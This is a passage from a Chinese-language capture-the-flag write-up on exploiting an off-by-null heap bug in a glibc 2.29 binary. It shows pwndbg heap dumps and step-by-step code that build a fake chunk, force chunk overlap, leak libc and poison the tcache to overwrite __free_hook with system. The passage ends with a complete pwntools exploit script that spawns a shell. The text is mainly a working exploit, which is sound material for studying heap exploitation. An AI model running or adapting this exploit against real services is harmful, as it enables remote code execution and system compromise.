(0x30)   tcache_entry[1](7): 0x5555557597a0 --> 0x555555759770 --> 0x555555759740 --> 0x555555759710 --> 0x5555557596e0 --> 0x5555557596b0 --> 0x555555759680

pwndbg> x/8gx 0x555555760000
0x555555760000:    0x0000000000000000    0x0000000000000031
0x555555760010:    0x0000000000000000    0x00000000000000f1  <=====fake
0x555555760020:    0x0000555555760030    0x0000555555760000  <=====fake->fd---->C->bk
0x555555760030:    0x0000000000000000    0x0000000000000031  <=====C
pwndbg> 
0x555555760040:    0x00007ffff7dd0cc0    0x0000555555760090  <=====C->bk
0x555555760050:    0x0000000000000000    0x0000000000000000
0x555555760060:    0x0000000000000030    0x0000000000000030
0x555555760070:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
pwndbg> 
0x555555760080:    0x0000000000000000    0x0000000000000000
0x555555760090:    0x0000000000000000    0x0000000000000031  <=====D
0x5555557600a0:    0x0000555555760030    0x00007ffff7dd0cc0
0x5555557600b0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x5555557600c0:    0x0000000000000030    0x0000000000000020
0x5555557600d0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600e0:    0x0000000000000000    0x0000000000000421
0x5555557600f0:    0x00007ffff7dd1090    0x00007ffff7dd1090

为了得到指向heap的bk，就已经绕了这么大一圈了，离谱，但是还得继续

然后我们要获取C chunk，并覆盖其bk指针，指向fake_chunk

#step7
    for i in range(7):
        add(i,0x20) #drain the 0x30 tcache bin
    add(8,0x20)        #C
    add(9,0x20)        #D, needed again in the next step
    edit(8,p64(0)+'\x10',0)  #low bytes of C->bk now point at the fake chunk in B

有了bk指针，那么就是要构造fastbin链表，为B->fd获取合适的fd指针。我们将D，B释放进入fastbin，先D，后B

#step8
    for i in range(7):
        delete(i)    #fill the tcache again so the next frees go to the fastbin
    delete(9)         #D goes into the fastbin
    delete(7)        #B goes into the fastbin, so B->fd == D (a heap pointer)

heap：

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x555555760000 --> 0x555555760090 --> 0x0   <======成功
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x555555761030 (size : 0x17fd0) 
       last_remainder: 0x5555557600e0 (size : 0x420) 
            unsortbin: 0x0
         largebin[ 0]: 0x5555557600e0 (size : 0x420)
(0x30)   tcache_entry[1](7): 0x555555759680 --> 0x5555557596b0 --> 0x5555557596e0 --> 0x555555759710 --> 0x555555759740 --> 0x555555759770 --> 0x5555557597a0

接下来把B malloc出来并覆盖其fd指向fake_chunk即可进行unlink + off-by-null == chunk overlapping

#step9
    for i in range(7):
        add(i,0x20)    #drain the 0x30 tcache bin
    add(7,0x20)        #B, which contains the fake chunk
    add(9,0x20)        #D
    edit(7,'\x10',0)#low bytes of B->fd now point at the fake chunk
    add(1,0x18)        #chunk used to write prev_size and overflow into the next chunk
    add(0,0xf0)     #the next chunk (the one that will be freed)
    edit(1,p64(0)*2 +p64(0xf0),0) #prev_size = 0xf0, and the off-by-null clears PREV_INUSE

heap：

pwndbg> x/8gx 0x555555760000
0x555555760000:    0x0000000000000000    0x0000000000000031   <====B & B->fd指针构造成功
0x555555760010:    0x0000555555760010    0x00000000000000f1   <====fake_chunk 
0x555555760020:    0x0000555555760030    0x0000555555760000   <====fake_chunk->bk指针构成成功
0x555555760030:    0x0000000000000000    0x0000000000000031   <====C  #8
pwndbg> 
0x555555760040:    0x0000000000000000    0x0000555555760010
0x555555760050:    0x0000000000000000    0x0000000000000000
0x555555760060:    0x0000000000000030    0x0000000000000031   
0x555555760070:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
pwndbg> 
0x555555760080:    0x0000000000000000    0x0000000000000000
0x555555760090:    0x0000000000000000    0x0000000000000031   <====D
0x5555557600a0:    0x0000000000000000    0x0000000000000000
0x5555557600b0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x5555557600c0:    0x0000000000000030    0x0000000000000021
0x5555557600d0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600e0:    0x0000000000000000    0x0000000000000021
0x5555557600f0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x555555760100:    0x00000000000000f0    0x0000000000000100  <====target
0x555555760110:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x555555760120:    0x0000000000000000    0x0000000000000000

接下来就很简单了：填充0x100 tcachebin + overlapping

#step10
    for i in range(7):
        add(i+1,0xf0)
    for i in range(7):
        delete(i+1) #fill the 0x100 tcache bin
#step11
    delete(0)        #free the target chunk: backward consolidation with the fake chunk gives the overlap


tcache attack
#get shell
    add(0,0x10)
    show(8)            #slot 8 (C) is still held and lies inside the merged free chunk
    # presumably the leaked value is the unsorted bin head; 0x3b3ca0 is for the author's libc -- verify
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3b3ca0
    show_addr('libc_addr',libc_addr)
    free_hook = libc_addr + libc.sym['__free_hook']
    show_addr('free_hook',free_hook)
    system_addr = libc_addr + libc.sym['system']
    show_addr('system_addr',system_addr)

    add(1,0x20)                  #NOTE(review): expected to alias slot 8 -- confirm in gdb
    delete(8)                    #put that chunk into the tcache
    edit(1,p64(free_hook),0)     #overwrite its next pointer through slot 1
    add(2,0x20)
    edit(2,"/bin/sh\x00",1)
    add(3,0x20)                  #expected to return __free_hook
    edit(3,p64(system_addr),0)
    delete(2)                    #free("/bin/sh") now calls system

完整EXP

#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-                           
#Author: Squarer
#Time: 2020.12.03 20.06.20
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*

context.arch = 'amd64'

def add(index,size):
    """Menu option 1: allocate `size` bytes into slot `index` of the target."""
    dialogue = (
        ('Choice?\n', '1'),
        ('Index?\n', str(index)),
        ('Size\n', str(size)),
    )
    for prompt, answer in dialogue:
        sh.sendlineafter(prompt, answer)

def edit(index,cont,n):
    """Menu option 3: write `cont` into slot `index`.

    n == 1 sends `cont` followed by a newline (sendline); n == 0 sends the
    raw bytes only, which is needed for the partial pointer overwrites where
    an extra newline byte would corrupt the pointer.

    `cont` is passed to pwntools unchanged: the previous ``str(cont)`` turns a
    bytes payload into its ``"b'...'"`` repr on Python 3.

    Raises:
        ValueError: if `n` is neither 0 nor 1 (previously nothing was sent
            and the target kept waiting for input).
    """
    sh.sendlineafter('Choice?\n','3')
    sh.sendlineafter('Index?\n',str(index))
    if n==1:
        sh.sendlineafter('content\n',cont)
    elif n==0:
        sh.sendafter('content\n',cont)
    else:
        raise ValueError('n must be 0 (raw send) or 1 (send with newline)')

def delete(index):
    """Menu option 4: free the chunk held in slot `index`."""
    for prompt, answer in [('Choice?\n', '4'), ('Index?\n', str(index))]:
        sh.sendlineafter(prompt, answer)

def show(index):
    """Menu option 2: ask the target to print slot `index`; the caller reads the output."""
    slot = str(index)
    steps = {'Choice?\n': '2', 'Index?\n': slot}
    for prompt in ('Choice?\n', 'Index?\n'):
        sh.sendlineafter(prompt, steps[prompt])

def show_addr(name,addr):
    """Log `addr` in hex, labelled with `name`, through the pwntools logger."""
    message = 'The %s Addr:%s' % (name, hex(addr))
    log.success(message)


# Remote target (placeholders -- replace with the real service address).
host = '1.1.1.1'
port = 10000
# 1: attack the local binary, 0: connect to host:port.
local = 1
if local:
    #context.log_level = 'debug'
    libc=ELF('/glibc/x64/2.29/lib/libc-2.29.so')
    sh = process('./by-null1_2.29')
else:
    #context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # Previously the literal strings 'host' and 'port' were passed here.
    sh = remote(host,port)


def pwn():
    """Exploit the glibc 2.29 build: fake chunk + off-by-null -> overlap -> tcache poisoning of __free_hook.

    A fake chunk is built inside B from the pointers a former large chunk
    left behind; its neighbours' bk/fd are then redirected to it with
    partial (low-byte) overwrites.  Every step depends on the heap state
    left by the previous one, so the order of the calls must not be changed.
    """
#step1: seven 0x30 chunks for later tcache filling, then padding so the
#       chunks used below start at a heap address whose low two bytes are zero
    for i in range(7):
        add(i,0x20)
    add(7,0x6980-0x30*7)
#step2
    add(7,0x4f0) #A, the future large chunk
    add(8,0x10)  #keeps A from merging with top
#step3
    delete(7)
    add(8,0x5f0) #larger than every free chunk, so A is moved into the largebin
    #gdb.attach(sh)
#step4,5
    for i in range(3):
        add(7+i,0x20) #B, C and a spacer block
    add(9,0x20)         #D, placed behind the spacer block
    #gdb.attach(sh)
    edit(7,p64(0)+p64(0xf1)+'\x30',0)  #fake chunk inside B (size 0xf1, low byte of its fd set to 0x30)
#step6
    for i in range(7):
        delete(i)   #fill the 0x30 tcache bin
    add(0,0x10)     #spacer between D and the rest of A
    #gdb.attach(sh)
    #D is freed first, so after the big malloc below C->bk == D in the smallbin
    delete(9)
    delete(8)

    add(0,0x500)     #large request that triggers the consolidation


#step7
    for i in range(7):
        add(i,0x20) #drain the 0x30 tcache bin
    add(8,0x20)        #C
    add(9,0x20)        #D
    edit(8,p64(0)+'\x10',0)  #low bytes of C->bk now point at the fake chunk in B
#step8
    for i in range(7):
        delete(i)    #fill the tcache again so the next frees go to the fastbin
    delete(9)         #D goes into the fastbin
    delete(7)        #B goes into the fastbin, so B->fd == D (a heap pointer)

#step9
    for i in range(7):
        add(i,0x20)    #drain the 0x30 tcache bin
    add(7,0x20)        #B, which contains the fake chunk
    add(9,0x20)        #D
    edit(7,'\x10',0)#low bytes of B->fd now point at the fake chunk
    add(1,0x18)        #chunk used to write prev_size and overflow into the next chunk
    add(0,0xf0)     #the next chunk (the one that will be freed)
    edit(1,p64(0)*2 +p64(0xf0),0) #prev_size = 0xf0, and the off-by-null clears PREV_INUSE
    #gdb.attach(sh)
#step10
    for i in range(7):
        add(i+1,0xf0)
    for i in range(7):
        delete(i+1) #fill the 0x100 tcache bin
#step11
    delete(0)        #free the target chunk: backward consolidation with the fake chunk gives the overlap
#get shell
    add(0,0x10)
    show(8)            #slot 8 (C) is still held and lies inside the merged free chunk
    # presumably the leaked value is the unsorted bin head; 0x3b3ca0 is for the author's libc -- verify
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3b3ca0
    show_addr('libc_addr',libc_addr)
    free_hook = libc_addr + libc.sym['__free_hook']
    show_addr('free_hook',free_hook)
    system_addr = libc_addr + libc.sym['system']
    show_addr('system_addr',system_addr)

    add(1,0x20)                  #NOTE(review): expected to alias slot 8 -- confirm in gdb
    delete(8)                    #put that chunk into the tcache
    edit(1,p64(free_hook),0)     #overwrite its next pointer through slot 1
    add(2,0x20)
    edit(2,"/bin/sh\x00",1)
    add(3,0x20)                  #expected to return __free_hook
    edit(3,p64(system_addr),0)
    delete(2)                    #free("/bin/sh") now calls system

if __name__ == '__main__':
    # Retry with a fresh process until one attempt succeeds (presumably
    # because the partial pointer overwrites only work for some heap
    # addresses -- confirm).
    while True:
        sh = process('./by-null1_2.29')
        try:
            pwn()
        except Exception as err:
            # `except Exception` (not a bare except) keeps Ctrl-C working.
            log.warning('attempt failed: %r' % (err,))
            sh.close()
            continue
        # Success: hand over the session once instead of looping again.
        sh.interactive()
        break